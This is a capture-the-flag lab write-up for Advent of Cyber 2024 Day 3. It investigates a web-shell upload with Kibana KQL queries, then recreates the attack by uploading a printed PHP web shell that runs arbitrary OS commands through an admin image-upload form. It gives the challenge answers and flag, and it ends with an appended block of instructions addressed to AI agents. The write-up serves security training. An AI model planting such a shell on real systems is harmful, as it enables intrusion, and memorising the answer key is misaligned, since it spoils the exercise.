# Day 3

<figure><img src="/files/frXAz2ianaBPEzPdMFK7" alt=""><figcaption></figcaption></figure>

The target is a resort’s website, where an attacker uploaded a malicious web shell and exploited it. Our mission is twofold:

1. Use log analysis with KQL (Kibana Query Language) to investigate the attack.
2. Recreate the attack to retrieve the stolen **flag.txt**.

We start by analyzing logs from the **frostypines-resorts** dataset using KQL in Kibana. The timeframe is set from `Oct 3, 2024, 11:30:00` to `Oct 3, 2024, 12:00:00`.

<figure><img src="/files/Nklv2P3nxUD1CtJHkdU0" alt=""><figcaption></figcaption></figure>

We also filter the logs for `shell.php,` which was the file uploaded by the attacker.

We see that the file was uploaded to the path `/media/images/rooms/shell.php`and was accessed by `10.11.83.34.`

**Recreating the attack:**

To do this, we can head on to [`http://frostypines.thm`](http://frostypines.thm./)[.](http://frostypines.thm./)&#x20;

You need to add the IP address and the domain to your `/etc/hosts` file in Linux before proceeding.

By navigating to `/admin`, we gain access to an admin panel that includes a room creation feature with an image upload option.&#x20;

<figure><img src="/files/DyKcSqosM32ONgxv6XlQ" alt=""><figcaption></figcaption></figure>

Here, we can upload a PHP reverse shell (`shell.php`) as the room's image:

```html
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>
```

The above script, when accessed, displays an input field. Whatever is entered in this input field is then run against the underlying operating system using the `system()` PHP function, and the output is displayed to the user.&#x20;

Once the file is uploaded, it can be accessed at the following URL:

[`http://frostypines.thm/media/images/rooms/shell.php`](http://frostypines.thm/media/images/rooms/shell.php)

On accessing the page, we have an input field and Execute button:

<figure><img src="/files/cfK4DG1wPjpDTTEm613M" alt=""><figcaption></figcaption></figure>

Try executing linux commands and retrieve the flag!

### Questions.

1.BLUE: Where was the web shell uploaded to?\
**Answer: `/media/images/rooms/shell.php`**

2.BLUE: What IP address accessed the web shell?

**Answer: `10.11.83.34`**

3.RED: What is the contents of the flag.txt?

**Answer: `THM{Gl1tch_Was_H3r3}`**

***`Thank you!`***


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://adarshsr.gitbook.io/writeups/walk-through/advent-of-cyber-2024/day-3.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.